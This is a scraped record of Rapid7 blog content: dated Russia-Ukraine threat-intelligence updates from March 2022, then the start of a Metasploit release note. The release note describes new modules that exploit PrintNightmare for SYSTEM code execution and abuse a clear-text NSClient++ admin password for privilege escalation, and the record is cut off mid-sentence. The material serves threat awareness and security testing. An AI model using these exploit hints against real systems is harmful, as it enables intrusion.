\n\nRussia may [default on $117 million (USD) in interest payments](<https://qz.com/2142075/sanctions-are-likely-to-force-russia-to-default-on-foreign-debt/>) on dollar-denominated bonds due to Western sanctions, the first foreign debt default by Russia since 1918.\n\nReuters is [reporting](<https://www.usnews.com/news/world/articles/2022-03-14/russian-delegation-suspends-participation-in-council-of-europe-body-ria>) that Russia's delegation to the Parliamentary Assembly of the Council of Europe (PACE) is suspending its participation and will not take part in meetings. \n\nCNN [reports](<https://www.cnn.com/europe/live-news/ukraine-russia-putin-news-03-15-22/h_3f0d63658ac5c2875ed265df00ba8b40>) that Russia has imposed sanctions against US President Joe Biden, his son, Secretary of State Antony Blinken, other US officials, and \u201cindividuals associated with them,\u201d the Russian Foreign Ministry said in a statement on Tuesday.\n\n**Threat Intelligence Update**\n\n * **Russian state-sponsored cyber actors access network misconfigured with default MFA protocols**\n\nCISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. 
The actors then exploited a critical Windows Print Spooler vulnerability, [\u201cPrintNightmare\u201d (CVE-2021-34527)](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>), to run arbitrary code with system privileges.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured>)_\n\n * **Fake antivirus updates used to deploy Cobalt Strike in Ukraine**\n\nUkraine's Computer Emergency Response Team is warning that threat actors are distributing fake Windows antivirus updates that install Cobalt Strike and other malware. The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download \"critical security updates,\" which come in the form of a 60 MB file named \"BitdefenderWindowsUpdatePackage.exe.\"\n\n_Source: [BleepingComputer/CERT-UA](<https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/amp/>)_\n\n * **A novel wiper targets Ukrainian entities**\n\nCybersecurity researchers observed the new CaddyWiper malware targeting Ukrainian organizations. Once deployed, CaddyWiper destroys and overwrites the data from any drives that are attached to the compromised system. 
Despite being released in close proximity to other wiping malware targeting Ukraine, such as HermeticWiper and IsaacWiper, CaddyWiper does not share any significant code similarities with them and appears to be created separately.\n\n_Source: [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/amp/>)_\n\n * **German Federal Office for Information Security agency issues an alert for Russian antivirus software Kaspersky**\n\nThe German Federal Office for Information Security agency (BSI) issued an alert urging its citizens to replace Kaspersky antivirus software with another defense solution, due to alleged ties to the Kremlin. The agency suggested Kaspersky could be used as a tool in the cyber conflict between Russia and Ukraine.\n\n_Source: [BSI](<https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html>)_\n\n## March 14, 2022\n\nThe EU-based NEXTA media group has [reported](<https://twitter.com/nexta_tv/status/1503393046351781892?s=20&t=1tA7lZrLVe-cZpHb9wy2LA>) that Russia is starting to block VPN services.\n\nBermuda\u2019s aviation regulator [said](<https://financialpost.com/pmn/business-pmn/bermuda-revokes-licenses-for-russian-operated-planes-over-safety-concerns>) it is suspending certification of all Russian-operated airplanes registered in the British overseas territory due to international sanctions over the war in Ukraine, in a move expected to affect more than 700 planes.\n\nThe Washington Post [reported](<https://www.washingtonpost.com/world/2022/03/12/russia-putin-google-apple-navalny/>) that agents of Russia's Federal Security Service (FSB, Federalnaya Sluzhba Bezopasnosti) approached Google and Apple executives with requests to remove apps created by activist groups.\n\nAmnesty International 
[said](<https://www.amnesty.org/en/latest/news/2022/03/russia-authorities-block-amnesty-internationals-russian-language-website/>) Russian authorities have blocked their Russian-language website. \n\n**Threat Intelligence Update**\n\n * **Anonymous claims to hack Rosneft, German subsidiary of Russian energy**\n\nAnonymous claimed to hack the German branch of the Russian energy giant Rosneft, allegedly stealing 20 TB of data. The company systems were significantly affected by the attack, although there currently seems to be no effect on the company's energy supply.\n\n_Source: [Security Affairs](<https://securityaffairs.co/wordpress/129052/hacktivism/anonymous-hacked-german-subsidiary-rosneft.html>)_\n\n * **Russia blocks access to Instagram nationwide**\n\nRussia's Internet moderator Roskomnadzor decided to block Instagram access in the country, following Meta's decision to allow \"calls for violence against Russian citizens.\" The federal agency gave Instagram users 48 hours to prepare and finally completed the act on March 13. 
The blocking of Instagram follows the former ban of Facebook and Twitter in Russia last week.\n\n_Source: [Cyber News](<https://cybernews.com/cyber-war/instagram-is-no-longer-accessible-in-russia/?utm_source=youtube&utm_medium=cn&utm_campaign=news_CNN_047_instagram_blocked_in_russia&utm_term=2v1_yubOBMc&utm_content=direct_article>)_\n\n## March 11, 2022\n\nPresident Biden, along with the European Union and the Group of Seven Countries, [moved](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/11/fact-sheet-united-states-european-union-and-g7-to-announce-further-economic-costs-on-russia/>) to revoke \u201cmost favored nation\u201d trade status for Russia, deny borrowing privileges at multilateral financial institutions, apply sanctions to additional Russian elites, ban export of luxury goods to Russia, and ban US import of goods from several signature sectors of Russia\u2019s economy.\n\n**Threat Intelligence Update**\n\n * **Amid difficulties with renewing certificates, Russia has created its own trusted TLS certificate authority**\n\nSigning authorities based in countries that have imposed sanctions on Russia can no longer accept payments for their services, leaving many sites with no practical means to renew expiring certificates. As a result, the Russian Ministry of Digital Development announced the availability of domestic certificates, replacing expired or revoked foreign certificates.\n\n_Source: [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>)_\n\n * **Triolan, a major Ukrainian internet service provider, was hacked \u2014 twice**\n\nTriolan, a Ukraine-based ISP with more than half a million subscribers, was reportedly hacked initially on February 24th, with a second attack hitting on March 9th. 
The company reported that the threat actors managed to hack into key components of the network, some of which couldn\u2019t be recovered.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/10/cyberattack-on-major-ukraine-internet-provider-causes-major-outages/?sh=768d17596573>)_\n\n## March 10, 2022\n\nBy [order of President Putin](<https://twitter.com/KevinRothrock/status/1501935395092631556?s=20&t=TvFRrQvNfQ6OL3qvFJePQg>), Russia\u2019s Economic Development Ministry has drafted a bill that would effectively nationalize assets and businesses \"abandoned\" in Russia by foreign corporations. Management of these seized assets will be entrusted to the VEB.RF state development corporation and to Russia\u2019s Deposit Insurance Agency.\n\nRussia has [effectively legalized patent theft](<http://publication.pravo.gov.ru/Document/View/0001202203070005?index=0&rangeSize=1>) from anyone affiliated with countries \u201cunfriendly\u201d to it, declaring that unauthorized use will not be compensated. 
The Russian news agency Tass has [further reporting](<https://tass.ru/ekonomika/13982403>) on this, as does the [Washington Post](<https://www.washingtonpost.com/business/2022/03/09/russia-allows-patent-theft/>).\n\nGoldman Sachs Group Inc [announced it was closing its operations in Russia](<https://www.reuters.com/business/finance/goldman-sachs-exit-russia-bloomberg-news-2022-03-10/>), becoming the first major Wall Street bank to exit the country following Moscow's invasion of Ukraine.\n\nUK Foreign Secretary Liz Truss [announced](<https://www.gov.uk/government/news/abramovich-and-deripaska-among-seven-oligarchs-targeted-in-estimated-15bn-sanction-hit>) a full asset freeze and travel ban on seven of Russia\u2019s wealthiest and most influential oligarchs, whose business empires, wealth, and connections are closely associated with the Kremlin.\n\nUS Vice President Kamala Harris [announced](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/10/vice-president-kamala-harris-announces-additional-u-s-funding-to-respond-to-humanitarian-needs-in-ukraine-and-eastern-europe/>) nearly $53 million in new humanitarian assistance from the United States government, through the US Agency for International Development (USAID), to support innocent civilians affected by Russia\u2019s invasion of Ukraine.\n\nThe International Atomic Energy Agency (IAEA) [provided an update](<https://www.iaea.org/newscenter/pressreleases/update-17-iaea-director-general-statement-on-situation-in-ukraine>) on the situation at the Chernobyl Nuclear Power Plant. The IAEA Director General said that the Agency is aware of reports that power has now been restored to the site and is looking for confirmation. At the same time, Ukraine informed them that today it had lost all communications with the facility. 
The IAEA has assured the international community that there has been \u201cno impact on essential safety systems.\u201d\n\n**Threat Intelligence Update**\n\n * **New malware variant targeting Russia named RURansom**\n\nRURansom is a malware variant that was recently discovered and appears to be targeting Russia. While it was initially suspected of being ransomware, further analysis suggests it is actually a wiper. So far, no active non-Russian targets have been identified, likely because the malware targets specific entities.\n\n_Source: [TrendMicro](<https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html>)_\n\n_Available in Threat Library as: RURansom_\n\n * **Kaspersky source code leak seems to be just a collection of publicly available HTML files**\n\nThe hacking group NB65 claimed on social networks to have leaked source code from the Russian antivirus firm Kaspersky. However, it appears that the leaked files are nothing more than a long list of HTML files and other related, publicly available web resources.\n\n_Source: [Cybernews](<https://cybernews.com/cyber-war/long-awaited-kaspersky-leak-doesnt-seem-to-be-a-leak-at-all/>)_\n\n * **Anonymous claims to hack Roskomnadzor, a Russian federal agency**\n\nHacktivist group Anonymous claims to have breached Roskomnadzor, a Russian federal agency responsible for monitoring, controlling, and censoring Russian mass media, leaking over 360,000 files (817.5 GB). Based on the report, the leak contains relatively recent censored documents, dated as late as March 5, and demonstrates Russia\u2019s attempts to censor media related to the conflict in Ukraine.\n\n_Source: @AnonOpsSE via [Twitter](<https://twitter.com/AnonOpsSE/status/1501944150794506256>)_\n\n## March 9, 2022\n\n**Public policy:** Citing concerns over rising cybersecurity risks related to the Russia-Ukraine conflict, the US is poised to enact new cyber incident reporting requirements. 
The [Cyber Incident Reporting for Critical Infrastructure Act of 2022](<https://www.congress.gov/bill/117th-congress/senate-bill/3600/text?q=%7B%22search%22%3A%5B%22s+3600%22%2C%22s%22%2C%223600%22%5D%7D&r=3&s=2>):\n\n * Will require critical-infrastructure owners and operators to report cybersecurity incidents to CISA within 72 hours of determining the incident is significant enough that reporting is required;\n * Will require critical infrastructure owners and operators to report ransomware payments to CISA within 24 hours; and\n * Is intended to give federal agencies more insight into attack trends and potentially provide early warnings of major vulnerabilities or attacks in progress before they spread.\n\nThe Bank of Russia [established](<https://www.cbr.ru/eng/press/event/?id=12744>) temporary procedures for foreign cash transactions, suspending sales of foreign currencies until September 9, 2022. Foreign currency accounts are limited to withdrawals up to $10,000 USD.\n\nThe Financial Crimes Enforcement Network (FinCEN) is [alerting all financial institutions](<https://www.fincen.gov/index.php/news/news-releases/fincen-advises-increased-vigilance-potential-russian-sanctions-evasion-attempts>) to be vigilant against efforts to evade the expansive sanctions and other US-imposed restrictions implemented in connection with the Russian Federation\u2019s further invasion of Ukraine.\n\nThe Pentagon [dismissed](<https://www.cnn.com/2022/03/08/politics/poland-jets-ukraine-russia/index.html>) Poland\u2019s offer to transfer MIG-29 fighter jets to the United States for delivery to Ukraine, stating they did not believe the proposal was \u201ctenable.\u201d\n\n**Threat Intelligence Update**\n\n * **Multiple hacking groups target Ukrainians and other European allies via phishing attacks**\n\nSeveral threat actors, including Fancy Bear, Ghostwriter, and Mustang Panda, have launched a large phishing campaign against Ukraine, Poland, and 
other European entities amid Russia's invasion of Ukraine. \n\n_Source: [The Hacker News](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>)_\n\n_Available in Threat Library as: APT28 (Fancy Bear), Ghostwriter, Mustang Panda_\n\n * **The Conti Ransomware group resumes activity following leaks**\n\nThe Conti Ransomware group appears to have made a comeback following the [leak of its internal chats last week](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>). On March 9, Rapid7 Threat Intelligence observed renewed activity on Conti\u2019s onion site, and CISA released new IOCs related to the group on their Conti alert page.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>)_\n\n_Available in Threat Library as: Conti_\n\n * **The Belarusian group UNC1151 targets Ukrainian organizations using MicroBackdoor malware**\n\nThe Ukrainian government has reported an ongoing cyberattack on Ukrainian state organizations using the Formbook malware.\n\n_Source: [Ukrainian CERT](<https://cert.gov.ua/article/37626>)_\n\n_Available in Threat Library as: UNC1151_\n\n## March 8, 2022\n\nThe US [announced](<https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/08/executive-order-on-use-of-project-labor-agreements-for-federal-construction-projects-2/>) a ban on imports of Russian oil, gas, and other energy products. New US investments in the Russian energy sector are also restricted. The UK [announced](<https://www.gov.uk/government/news/uk-to-phase-out-russian-oil-imports>) it would phase out Russian oil over 2022. \n\nThe International Atomic Energy Agency [published a statement](<https://www.iaea.org/newscenter/pressreleases/update-15-iaea-director-general-statement-on-situation-in-ukraine>) noting that remote data transmission from monitoring systems at Ukraine\u2019s mothballed Chernobyl nuclear power plant has been lost. 
No network data has been observed by internet monitoring companies since March 5, 2022.\n\nChris Chivvis, a senior fellow and director of the American Statecraft Program at the Carnegie Endowment for International Peace, has provided [an assessment](<https://carnegieendowment.org/2022/03/03/how-does-this-end-pub-86570>) of two likely trajectories in the Russia-Ukraine conflict. \n\nTwitter [announced](<https://twitter.com/AlecMuffett/status/1501282223009542151?s=20&t=tO-TNZw5ct6tZUcwyvMl4A>) they have made their social network available as a Tor onion service, which will enable greater privacy, integrity, trust, and availability for global users.\n\nThe Minister of Foreign Affairs of the Republic of Poland [announced](<https://www.gov.pl/web/diplomacy/statement-of-the-minister-of-foreign-affairs-of-the-republic-of-poland-in-connection-with-the-statement-by-the-us-secretary-of-state-on-providing-airplanes-to-ukraine>) they are ready to deploy \u2014 immediately and free of charge \u2014 all their MIG-29 jets to the Ramstein Air Force base and place them at the disposal of the US government.\n\nLumen [announced](<https://news.lumen.com/RussiaUkraine>) they are immediately ceasing their limited operations in Russia and will no longer provide services to local Lumen enterprise customers.\n\nMcDonald\u2019s [announced](<https://www.cnbc.com/2022/03/08/mcdonalds-will-temporarily-close-850-restaurants-in-russia-nearly-2-weeks-after-putin-invaded-ukraine.html>) they have temporarily closed 850 restaurants in Russia in response to Russia\u2019s attack on Ukraine.\n\nStarbucks [has announced](<https://www.cnbc.com/2022/03/08/starbucks-suspends-all-business-in-russia-as-putins-forces-attack-ukraine.html>) they will be suspending all business in Russia in response to Russia\u2019s attack on Ukraine.\n\n**Threat Intelligence Update**\n\n * **52 US organizations were impacted by RagnarLocker ransomware, including critical infrastructure**\n\nThe FBI 
reported that as of January 2021, 52 US-based organizations, some related to critical infrastructure, were affected by RagnarLocker ransomware. The industries affected include manufacturing, energy, financial services, government, and information technology. The malware refuses to execute in post-Soviet countries, including Russia, based on a geolocation check embedded in its code.\n\n_Source: [FBI FLASH](<https://www.ic3.gov/Media/News/2022/220307.pdf>)_\n\n_Available in Threat Library as: Ragnar Locker_\n\n * **US energy companies were attacked prior to the Russian invasion of Ukraine**\n\nDuring a two-week blitz in mid-February, hackers gained access to dozens of computers belonging to multiple US-based energy companies, including [Chevron Corp.](<https://www.bloomberg.com/quote/CVX:US>), [Cheniere Energy Inc.](<https://www.bloomberg.com/quote/LNG:US>), and [Kinder Morgan Inc](<https://www.bloomberg.com/quote/KMI:US>). The companies were attacked in parallel with the Russian invasion of Ukraine.\n\n_Source: [Bloomberg](<https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine>)_\n\n * **European officials were hacked by Chinese threat actors amid the conflict in Ukraine**\n\nAccording to Google and Proofpoint, a cyberattack was launched by the Chinese hacking group Mustang Panda and its affiliated group RedDelta, which usually targets Southeast Asian countries. 
The groups managed to gain access to an unidentified European NATO-member email account and spread malware to other diplomatic offices.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/08/chinese-hackers-ramp-up-europe-attacks-in-time-with-russia-ukraine-war/?sh=6077d22f5ee1>)_\n\n_Available in Threat Library as: Mustang Panda_\n\n * **#OpAmerica: DEVLIX_EU, a pro-Russian hacktivist group, and its affiliates claim to have gained access to terabytes of US sensitive data**\n\nThe group claims they have obtained access to 92TB of data related to the US Army. According to the group, they also hacked into four of the biggest \u201chosts\u201d in the US and 49 TB of data. As of now, there is no real evidence for the attack provided by the group.\n\n_Source: @Ex_anon_W_hater via [Twitter](<https://twitter.com/Ex_anon_W_hater/status/1500858398664888325>)_\n\n## March 7, 2022\n\nNetflix, KPMG, PwC, and EY have [cut ties with local units in Russia,](<https://www.reuters.com/business/netflix-kpmg-pwc-amex-sever-ties-with-russia-2022-03-06/>) and Danone suspended investments in Russia.\n\nThe Russian government has [published a list of foreign states](<https://www.jpost.com/international/article-700559>) that have committed \u201cunfriendly actions\u201d against \u201cRussia, Russian companies, and citizens.\u201d Countries listed include Australia, Albania, Andorra, the United Kingdom, the member states of the European Union, Iceland, Canada, Liechtenstein, Micronesia, Monaco, New Zealand, Norway, Republic of Korea, San Marino, North Macedonia, Singapore, USA, Taiwan, Ukraine, Montenegro, Switzerland, and Japan.\n\nThe Russian government\u2019s Ministry of Digital [issued orders](<https://www.kommersant.ru/doc/5249500>) for all government websites to use only domestic hosting providers and DNS. 
They further instructed agencies to discontinue using non-Russian third-party tooling, such as Google Analytics.\n\nTikTok is [suspending content from Russia](<https://www.buzzfeednews.com/article/krystieyandoli/tiktok-russia-suspending-media>) in response to the country cracking down on reporting about the invasion of Ukraine.\n\n**Threat Intelligence Update**\n\n * **Anonymous-affiliated threat actor claims to have hacked and shut down water infrastructure in Russia**\n\nThe AnonGhost group claims to have hacked and shut down two Russian SCADA water supply systems, impacting the Russian cities of Volkhov, Boksitogorsk, Luga, Slantsevsky, Tikhvinsky, and Vyborg.\n\n_Source: @darkowlcyber via [Twitter](<https://twitter.com/darkowlcyber/status/1500552186735910915?s=20&t=zXmKgw6Om_VQMHa6XmN6RQ>)_\n\n_Available in Threat Library as: AnonGhost (for Threat Command customers who want to learn more)_\n\n * **Anonymous claims to hack Russian TV services to broadcast footage of the war with Ukraine**\n\nAccording to Anonymous, the Russian live TV channels Russia 24, Channel One, and Moscow 24, as well as the Netflix-like streaming services Wink and Ivi, have been hacked to broadcast footage of the war with Ukraine.\n\n_Source: @YourAnonNews via [Twitter](<https://twitter.com/YourAnonNews/status/1500613013510008836?s=20&t=qgOO0Uu5T2UrkqdbjEJeAg>)_\n\n## March 4, 2022\n\nThe NATO Cooperative Cyber Defence Center of Excellence (CCDCOE) announced that [Ukraine will join the group](<https://news.yahoo.com/ukraine-join-nato-cyber-defence-171835083.html>) as a \u201ccontributing participant,\u201d indicating that \u201cUkraine could bring valuable first-hand knowledge of several adversaries within the cyber domain to be used for research, exercises, and training.\u201d\n\nUkraine\u2019s deputy chief of their information protection service [noted in a Friday briefing](<https://www.bloomberg.com/news/articles/2022-03-04/ukraine-s-hacker-army-said-to-be-helped-by-400-000-supporters>) that over 400,000 
individuals have volunteered to help a crowdsourced Ukrainian government effort to disrupt Russian government and military targets.\n\n**Threat Intelligence Update**\n\n * **Russia blocked access to social media platforms and Western news sites**\n\nRussia has blocked its residents' access to information channels, including Facebook, Twitter, Western news sites such as the BBC, and app stores. In response, the BBC is now providing access to its website via the Dark Web and has reinstated its shortwave broadcast service.\n\n_Source: [Reuters](<https://www.reuters.com/business/russias-offer-foreign-firms-stay-leave-or-hand-over-keys-2022-03-04/>)_\n\n * **Anonymous-affiliated threat actor hacked and leaked data from the Russian Federal State Budgetary Institution of Science**\n\nThe Russian Federal Guard Service of the Russian Federation was hacked by Anonymous. The hacker published leaked names, usernames, emails, and hashed passwords of people from the institution.\n\n_Source: @PucksReturn via [Twitter](<https://twitter.com/PucksReturn/status/1499757796526542855?s=20&t=LQqanSu2v7L5ONAkpZT1PA>)_\n\n * **Anonymous takes down multiple Russian government websites**\n\nAnonymous claims responsibility for the takedown of a large number of Russian Government websites, including one of the main government websites, gov.ru. Most of the websites are still down as of Friday afternoon, March 4.\n\n_Source: @Anonynewsitaly via [Twitter](<https://twitter.com/Anonynewsitaly/status/1499488100405362694?s=20&t=92-u27VSsZLoTAz1KtuOKA>)_\n\n## March 3, 2022\n\n**Additional sanctions:** The US Treasury Dept. [announced another round of sanctions](<https://home.treasury.gov/news/press-releases/jy0628>) on Russian elites, as well as many organizations it characterized as outlets of disinformation and propaganda.\n\n**Public policy:** The Russia-Ukraine conflict is adding momentum to cybersecurity regulatory actions. 
Most recently, that includes:\n\n * **[Incident reporting law](<https://www.hsgac.senate.gov/media/majority-media/senate-passes-peters-and-portman-landmark-legislative-package-to-strengthen-public-and-private-sector-cybersecurity->):** Citing the need to defend against potential retaliatory attacks from Russia, the US Senate passed a bill to require critical infrastructure owners and operators to report significant cybersecurity incidents to CISA, as well as ransomware payments. The US House is now considering fast-tracking this bill, which means it may become law quite soon.\n * **[FCC inquiry on BGP security](<https://www.fcc.gov/document/fcc-launches-inquiry-internet-routing-vulnerabilities>):** \u201c[E]specially in light of Russia\u2019s escalating actions inside of Ukraine,\u201d FCC seeks comment on vulnerabilities threatening the Border Gateway Protocol (BGP) that is central to the Internet\u2019s global routing system.\n\n**CISA threat advisory:** CISA [recently reiterated](<https://twitter.com/CISAJen/status/1499117064006639617?s=20&t=9UfrQnQTUg43QsbKoQOhJA>) that it has no specific, credible threat against the U.S. at this time. 
It continues to point to its [Shields Up](<https://www.cisa.gov/shields-up>) advisory for resources and updates related to the Russia-Ukraine conflict.\n\n**Threat Intelligence Update**\n\n * **An Anonymous-affiliated hacking group claims to have hacked a branch of the Russian Military and Rosatom, the Russian State Atomic Energy Corporation.**\n\nThe hacktivist group Anonymous and its affiliate have hacked and leaked the phone directory of the military prosecutor's office of the southern military district of Russia, as well as documents from the Rosatom State Atomic Energy Corporation.\n\n_Available in Threat Library as: OpRussia 2022 (for Threat Command customers who want to learn more)_\n\n * **A threat actor supporting Russia claims to have hacked and leaked sensitive information related to the Ukrainian military.**\n\nThe threat actor \u201cLenovo\u201d claims to have hacked a branch of the Ukrainian military and leaked confidential information related to its soldiers. The information was published on an underground Russian hacking forum.\n\n_Source: XSS forum (discovered by our threat hunters on the dark web)_\n\n * **An Anonymous-affiliated hacktivist group took down the popular Russian news website lenta.ru**\n\nAs part of the OpRussia cyber-attack campaign, an Anonymous hacktivist group known as \u201cEl_patron_real\u201d took down one of the most popular Russian news websites, **lenta.ru**. 
As of Thursday afternoon, March 3, the website is still down.\n\n_Available in Threat Library as: El_patron_real (for Threat Command customers who want to learn more)_\n\n_**Additional reading:**_\n\n * [_Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>)\n * [_Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)\n * [_Staying Secure in a Global Cyber Conflict_](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)\n * [_Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict_](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-04T14:30:00", "type": "rapid7blog", "title": "Russia-Ukraine Cybersecurity Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-04T14:30:00", "id": "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "href": "https://blog.rapid7.com/2022/03/04/russia-ukraine-cybersecurity-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-09T18:55:38", "description": "## PrintNightmare\n\nRapid7 security researchers [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Spencer McIntyre](<https://github.com/zeroSteiner>) have added a new module for [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The Print Spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as `NT AUTHORITY\\SYSTEM`.\n\nBecause Metasploit's SMB server doesn't support SMB3 (yet), it's highly recommended to use an external SMB server like Samba that supports SMB3. The [Metasploit module documentation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md>) details the process of generating a payload DLL and using this module to load it.\n\n[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) is being actively exploited in the wild. 
For more information and a full timeline, see [Rapid7\u2019s blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)!\n\n## NSClient++\n\nGreat work by community contributor [Yann Castel](<https://github.com/Hakyac>) on their new NSClient++ module. This module allows an attacker with an unprivileged Windows account to gain admin access on a Windows system and start a shell.\n\nFor this module to work, both the web interface of NSClient++ and the `ExternalScripts` feature must be enabled. You must also know where the NSClient config file is, as it is used to read the admin password, which is stored in clear text.\n\n## New module content (2)\n\n * [Print Spooler Remote DLL Injection](<https://github.com/rapid7/metasploit-framework/pull/15385>) by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>) - A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker-controlled DLL as the `SYSTEM` user.\n\n * [NSClient++ 0.5.2.35 - Privilege escalation](<https://github.com/rapid7/metasploit-framework/pull/15318>) by BZYO, Yann Castel and kindredsec - This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. 
The module retrieves the admin password from a config file at a customizable path and, so long as NSClient++ has both the web interface and the ExternalScripts feature enabled, gains a SYSTEM shell.\n\n## Enhancements and features\n\n * [#15366](<https://github.com/rapid7/metasploit-framework/pull/15366>) from [pingport80](<https://github.com/pingport80>) - This updates how the msfconsole's history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).\n\n## Bugs fixed\n\n * [#15320](<https://github.com/rapid7/metasploit-framework/pull/15320>) from [agalway-r7](<https://github.com/agalway-r7>) - A bug has been fixed in the `read_file` method of `lib/msf/core/post/file.rb` that prevented PowerShell sessions from being able to use the `read_file()` method. PowerShell sessions should now be able to use this method to read files from the target system.\n * [#15371](<https://github.com/rapid7/metasploit-framework/pull/15371>) from [bcoles](<https://github.com/bcoles>) - This fixes an issue in the `apport_abrt_chroot_priv_esc` module where the check method would fail if the `apport-cli` binary was not in the PATH.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-06-30T14%3A00%3A49-05%3A00..2021-07-08T16%3A19%3A37%2B01%3A00%22>)\n * [Full diff 6.0.51...6.0.52](<https://github.com/rapid7/metasploit-framework/compare/6.0.51...6.0.52>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly 
